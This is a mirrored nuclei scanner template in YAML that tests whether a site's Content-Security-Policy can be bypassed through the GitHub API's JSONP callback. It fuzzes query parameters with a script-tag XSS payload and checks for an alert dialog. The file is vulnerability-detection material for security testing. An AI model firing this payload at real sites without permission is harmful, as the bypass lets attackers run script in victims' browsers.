mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-16 23:53:28 +08:00
55 lines
1.2 KiB
YAML
55 lines
1.2 KiB
YAML
id: github-api-csp-bypass
|
|
|
|
info:
|
|
name: Content-Security-Policy Bypass - GitHub API
|
|
author: renniepak,DhiyaneshDK
|
|
severity: medium
|
|
reference:
|
|
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
|
|
metadata:
|
|
verified: true
|
|
tags: xss,csp-bypass,github-api
|
|
|
|
flow: http(1) && headless(1)
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Security-Policy"
|
|
- "github.com"
|
|
condition: and
|
|
internal: true
|
|
|
|
headless:
|
|
- steps:
|
|
- action: navigate
|
|
args:
|
|
url: "{{BaseURL}}"
|
|
|
|
- action: waitdialog
|
|
name: github_api_csp_xss
|
|
args:
|
|
max-duration: 5s
|
|
|
|
payloads:
|
|
injection:
|
|
- '<script src="https://api.github.com/gist/anything?callback=alert"></script>'
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: replace
|
|
mode: single
|
|
fuzz:
|
|
- "{{url_encode(injection)}}"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "github_api_csp_xss == true"
|
|
# digest: 4a0a00473045022100a4fa899ea8f67f8efdded78911d4d564e356af3f5fd38f016639e29643fc38680220219e632ebbfc09c166d1e0e3133a4e9ec8cdaed01132037a6ab2557972121c36:922c64590222798bb761d5b6d8e72950 |